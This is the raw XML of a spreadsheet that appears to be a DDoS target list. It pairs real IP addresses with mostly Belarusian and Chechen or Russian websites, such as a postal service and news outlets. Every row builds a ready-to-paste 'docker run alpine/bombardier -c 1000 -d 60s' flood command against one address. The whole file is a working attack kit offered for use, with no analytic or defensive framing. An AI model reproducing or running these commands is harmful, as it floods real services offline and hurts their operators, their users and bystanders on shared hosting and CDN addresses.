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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="223">
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.84.119.236&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.84.119.236</t>
  </si>
  <si>
    <t>kp.by</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.232.92.25&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>193.232.92.25</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 37.17.56.12&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>37.17.56.12</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.124.138.155&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>178.124.138.155</t>
  </si>
  <si>
    <t>ctv.by</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.164.233&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.98.164.233</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.124.138.154&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>178.124.138.154</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.124.138.24&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>178.124.138.24</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 138.68.75.50&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>138.68.75.50</t>
  </si>
  <si>
    <t>21.by</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 172.253.115.26&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>172.253.115.26</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 64.233.184.27&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>64.233.184.27</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 64.233.184.26&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>64.233.184.26</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 209.85.202.27&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>209.85.202.27</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 209.85.202.26&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>209.85.202.26</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.0.170.23&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>193.0.170.23</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 173.245.59.194&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>173.245.59.194</t>
  </si>
  <si>
    <t>ej.by</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 108.162.192.107&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>108.162.192.107</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 77.88.21.249&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>77.88.21.249</t>
  </si>
  <si>
    <t>grozny.tv</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.129.100.200&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.129.100.200</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 186.2.170.100&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>186.2.170.100</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.178.208.45&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.178.208.45</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.60.110&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>104.21.60.110</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 89.188.109.70&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>89.188.109.70</t>
  </si>
  <si>
    <t>grozny-inform.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 94.100.180.180&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>94.100.180.180</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.241.116.117&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>188.241.116.117</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.159.233.17&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>85.159.233.17</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 46.165.223.182&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>46.165.223.182</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 108.59.1.205&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>108.59.1.205</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 186.2.163.112&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>186.2.163.112</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 90.189.182.182&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>90.189.182.182</t>
  </si>
  <si>
    <t>ngrz.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.58.117.18&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>194.58.117.18</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 144.76.167.14&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>144.76.167.14</t>
  </si>
  <si>
    <t>chechnyatoday.com</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.178.208.177&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.178.208.177</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.249.83.165&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>80.249.83.165</t>
  </si>
  <si>
    <t>dpd.by</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.217.20.1&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.217.20.1</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.217.21.1&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.217.21.1</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.66.69.19&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.66.69.19</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.40.2.9&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>188.40.2.9</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.172.201.84&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>178.172.201.84</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.127&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.99.127</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.67&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.99.67</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.57&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.99.57</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.84&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.99.84</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.73&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.99.73</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.44&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.99.44</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.72&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.99.72</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.71&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.99.71</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 198.54.126.25&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>198.54.126.25</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.209.148.74&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>85.209.148.74</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.84.119.237&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.84.119.237</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 167.71.55.106&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>167.71.55.106</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 52.128.23.153&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>52.128.23.153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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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34.102.136.180&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>34.102.136.180</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.7&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.209.80.7</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 205.178.189.131&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>205.178.189.131</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.23.56&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.23.56</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 149.232.252.3&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>149.232.252.3</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.124.193.27&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>178.124.193.27</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 149.232.252.19&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>149.232.252.19</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 45.155.60.4&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>45.155.60.4</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.230&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.209.80.230</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 45.155.60.8&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>45.155.60.8</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 62.138.245.10&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>62.138.245.10</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.3.234&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>104.21.3.234</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.50.4.186&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>195.50.4.186</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.106.250&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.106.250</t>
  </si>
  <si>
    <t>belpost.by</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.22.41&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.22.41</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.88&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.99.88</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 82.209.219.60&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>82.209.219.60</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.162.198&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.98.162.198</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 117.52.98.56&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>117.52.98.56</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 3.64.163.50&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>3.64.163.50</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.162.197&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.98.162.197</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.162.193&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.98.162.193</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.22.132&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.22.132</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 107.161.23.204&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>107.161.23.204</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 51.83.138.45&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>51.83.138.45</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.124.160.223&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>178.124.160.223</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 86.57.145.166&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>86.57.145.166</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 78.46.101.98&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>78.46.101.98</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.162.195&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.98.162.195</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.26.187&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>104.21.26.187</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.37.28&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>104.21.37.28</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.73.144&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>104.21.73.144</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.168.78&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.98.168.78</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.168.75&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.98.168.75</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.164.68&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.98.164.68</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 164.88.67.126&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>164.88.67.126</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.162.196&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.98.162.196</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.168.70&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.98.168.70</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.164.69&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.98.164.69</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.168.76&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.98.168.76</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.168.66&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.98.168.66</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.219.194.11&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.219.194.11</t>
  </si>
  <si>
    <t>autolight.by</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.172.173.136&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>178.172.173.136</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.247.76.71&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.247.76.71</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 64.32.28.254&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>64.32.28.254</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.40.92.90&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>188.40.92.90</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 35.186.238.101&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>35.186.238.101</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.31.217&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.31.217</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 66.81.199.56&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>66.81.199.56</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.30.201&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>93.125.30.201</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 18.116.152.12&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>18.116.152.12</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 3.130.204.160&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>3.130.204.160</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.29.14&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>104.21.29.14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</si>
</sst>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82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3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3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9</v>
      </c>
      <c r="D4" s="3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9</v>
      </c>
      <c r="D5" s="3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9</v>
      </c>
      <c r="D6" s="3"/>
      <c r="E6" s="3"/>
    </row>
    <row r="7" ht="15.35" customHeight="1">
      <c r="A7" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B7&amp;"&amp;&amp; sleep 5;"</f>
        <v>14</v>
      </c>
      <c r="B7" t="s" s="2">
        <v>15</v>
      </c>
      <c r="C7" t="s" s="2">
        <v>9</v>
      </c>
      <c r="D7" s="3"/>
      <c r="E7" s="3"/>
    </row>
    <row r="8" ht="15.35" customHeight="1">
      <c r="A8" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B8&amp;"&amp;&amp; sleep 5;"</f>
        <v>16</v>
      </c>
      <c r="B8" t="s" s="2">
        <v>17</v>
      </c>
      <c r="C8" t="s" s="2">
        <v>18</v>
      </c>
      <c r="D8" s="3"/>
      <c r="E8" s="3"/>
    </row>
    <row r="9" ht="15.35" customHeight="1">
      <c r="A9" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B9&amp;"&amp;&amp; sleep 5;"</f>
        <v>19</v>
      </c>
      <c r="B9" t="s" s="2">
        <v>20</v>
      </c>
      <c r="C9" t="s" s="2">
        <v>18</v>
      </c>
      <c r="D9" s="3"/>
      <c r="E9" s="3"/>
    </row>
    <row r="10" ht="15.35" customHeight="1">
      <c r="A10" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B10&amp;"&amp;&amp; sleep 5;"</f>
        <v>21</v>
      </c>
      <c r="B10" t="s" s="2">
        <v>22</v>
      </c>
      <c r="C10" t="s" s="2">
        <v>18</v>
      </c>
      <c r="D10" s="3"/>
      <c r="E10" s="3"/>
    </row>
    <row r="11" ht="15.35" customHeight="1">
      <c r="A11" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B11&amp;"&amp;&amp; sleep 5;"</f>
        <v>23</v>
      </c>
      <c r="B11" t="s" s="2">
        <v>24</v>
      </c>
      <c r="C11" t="s" s="2">
        <v>18</v>
      </c>
      <c r="D11" s="3"/>
      <c r="E11" s="3"/>
    </row>
    <row r="12" ht="15.35" customHeight="1">
      <c r="A12" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B12&amp;"&amp;&amp; sleep 5;"</f>
        <v>25</v>
      </c>
      <c r="B12" t="s" s="2">
        <v>26</v>
      </c>
      <c r="C12" t="s" s="2">
        <v>18</v>
      </c>
      <c r="D12" s="3"/>
      <c r="E12" s="3"/>
    </row>
    <row r="13" ht="15.35" customHeight="1">
      <c r="A13" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B13&amp;"&amp;&amp; sleep 5;"</f>
        <v>27</v>
      </c>
      <c r="B13" t="s" s="2">
        <v>28</v>
      </c>
      <c r="C13" t="s" s="2">
        <v>18</v>
      </c>
      <c r="D13" s="3"/>
      <c r="E13" s="3"/>
    </row>
    <row r="14" ht="15.35" customHeight="1">
      <c r="A14" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B14&amp;"&amp;&amp; sleep 5;"</f>
        <v>29</v>
      </c>
      <c r="B14" t="s" s="2">
        <v>30</v>
      </c>
      <c r="C14" t="s" s="2">
        <v>18</v>
      </c>
      <c r="D14" s="3"/>
      <c r="E14" s="3"/>
    </row>
    <row r="15" ht="15.35" customHeight="1">
      <c r="A15" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B15&amp;"&amp;&amp; sleep 5;"</f>
        <v>31</v>
      </c>
      <c r="B15" t="s" s="2">
        <v>32</v>
      </c>
      <c r="C15" t="s" s="2">
        <v>33</v>
      </c>
      <c r="D15" s="3"/>
      <c r="E15" s="3"/>
    </row>
    <row r="16" ht="15.35" customHeight="1">
      <c r="A16" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B16&amp;"&amp;&amp; sleep 5;"</f>
        <v>34</v>
      </c>
      <c r="B16" t="s" s="2">
        <v>35</v>
      </c>
      <c r="C16" t="s" s="2">
        <v>33</v>
      </c>
      <c r="D16" s="3"/>
      <c r="E16" s="3"/>
    </row>
    <row r="17" ht="15.35" customHeight="1">
      <c r="A17" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B17&amp;"&amp;&amp; sleep 5;"</f>
        <v>36</v>
      </c>
      <c r="B17" t="s" s="2">
        <v>37</v>
      </c>
      <c r="C17" t="s" s="2">
        <v>38</v>
      </c>
      <c r="D17" s="3"/>
      <c r="E17" s="3"/>
    </row>
    <row r="18" ht="16" customHeight="1">
      <c r="A18" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B18&amp;"&amp;&amp; sleep 5;"</f>
        <v>39</v>
      </c>
      <c r="B18" t="s" s="2">
        <v>40</v>
      </c>
      <c r="C18" t="s" s="4">
        <v>38</v>
      </c>
      <c r="D18" s="3"/>
      <c r="E18" s="3"/>
    </row>
    <row r="19" ht="16" customHeight="1">
      <c r="A19" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B19&amp;"&amp;&amp; sleep 5;"</f>
        <v>41</v>
      </c>
      <c r="B19" t="s" s="2">
        <v>42</v>
      </c>
      <c r="C19" t="s" s="4">
        <v>38</v>
      </c>
      <c r="D19" s="3"/>
      <c r="E19" s="3"/>
    </row>
    <row r="20" ht="16" customHeight="1">
      <c r="A20" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B20&amp;"&amp;&amp; sleep 5;"</f>
        <v>43</v>
      </c>
      <c r="B20" t="s" s="2">
        <v>44</v>
      </c>
      <c r="C20" t="s" s="4">
        <v>38</v>
      </c>
      <c r="D20" s="3"/>
      <c r="E20" s="3"/>
    </row>
    <row r="21" ht="15" customHeight="1">
      <c r="A21" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B21&amp;"&amp;&amp; sleep 5;"</f>
        <v>45</v>
      </c>
      <c r="B21" t="s" s="2">
        <v>46</v>
      </c>
      <c r="C21" t="s" s="4">
        <v>38</v>
      </c>
      <c r="D21" s="3"/>
      <c r="E21" s="3"/>
    </row>
    <row r="22" ht="15.35" customHeight="1">
      <c r="A22" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B22&amp;"&amp;&amp; sleep 5;"</f>
        <v>45</v>
      </c>
      <c r="B22" t="s" s="2">
        <v>46</v>
      </c>
      <c r="C22" t="s" s="2">
        <v>38</v>
      </c>
      <c r="D22" s="3"/>
      <c r="E22" s="3"/>
    </row>
    <row r="23" ht="15.35" customHeight="1">
      <c r="A23" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B23&amp;"&amp;&amp; sleep 5;"</f>
        <v>47</v>
      </c>
      <c r="B23" t="s" s="2">
        <v>48</v>
      </c>
      <c r="C23" t="s" s="2">
        <v>49</v>
      </c>
      <c r="D23" s="3"/>
      <c r="E23" s="3"/>
    </row>
    <row r="24" ht="15.35" customHeight="1">
      <c r="A24" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B24&amp;"&amp;&amp; sleep 5;"</f>
        <v>50</v>
      </c>
      <c r="B24" t="s" s="2">
        <v>51</v>
      </c>
      <c r="C24" t="s" s="2">
        <v>49</v>
      </c>
      <c r="D24" s="3"/>
      <c r="E24" s="3"/>
    </row>
    <row r="25" ht="15.35" customHeight="1">
      <c r="A25" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B25&amp;"&amp;&amp; sleep 5;"</f>
        <v>52</v>
      </c>
      <c r="B25" t="s" s="2">
        <v>53</v>
      </c>
      <c r="C25" t="s" s="2">
        <v>49</v>
      </c>
      <c r="D25" s="3"/>
      <c r="E25" s="3"/>
    </row>
    <row r="26" ht="15.35" customHeight="1">
      <c r="A26" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B26&amp;"&amp;&amp; sleep 5;"</f>
        <v>54</v>
      </c>
      <c r="B26" t="s" s="2">
        <v>55</v>
      </c>
      <c r="C26" t="s" s="2">
        <v>49</v>
      </c>
      <c r="D26" s="3"/>
      <c r="E26" s="3"/>
    </row>
    <row r="27" ht="15.35" customHeight="1">
      <c r="A27" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B27&amp;"&amp;&amp; sleep 5;"</f>
        <v>56</v>
      </c>
      <c r="B27" t="s" s="2">
        <v>57</v>
      </c>
      <c r="C27" t="s" s="2">
        <v>49</v>
      </c>
      <c r="D27" s="3"/>
      <c r="E27" s="3"/>
    </row>
    <row r="28" ht="15.35" customHeight="1">
      <c r="A28" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B28&amp;"&amp;&amp; sleep 5;"</f>
        <v>58</v>
      </c>
      <c r="B28" t="s" s="2">
        <v>59</v>
      </c>
      <c r="C28" t="s" s="2">
        <v>49</v>
      </c>
      <c r="D28" s="3"/>
      <c r="E28" s="3"/>
    </row>
    <row r="29" ht="15.35" customHeight="1">
      <c r="A29" t="s" s="2">
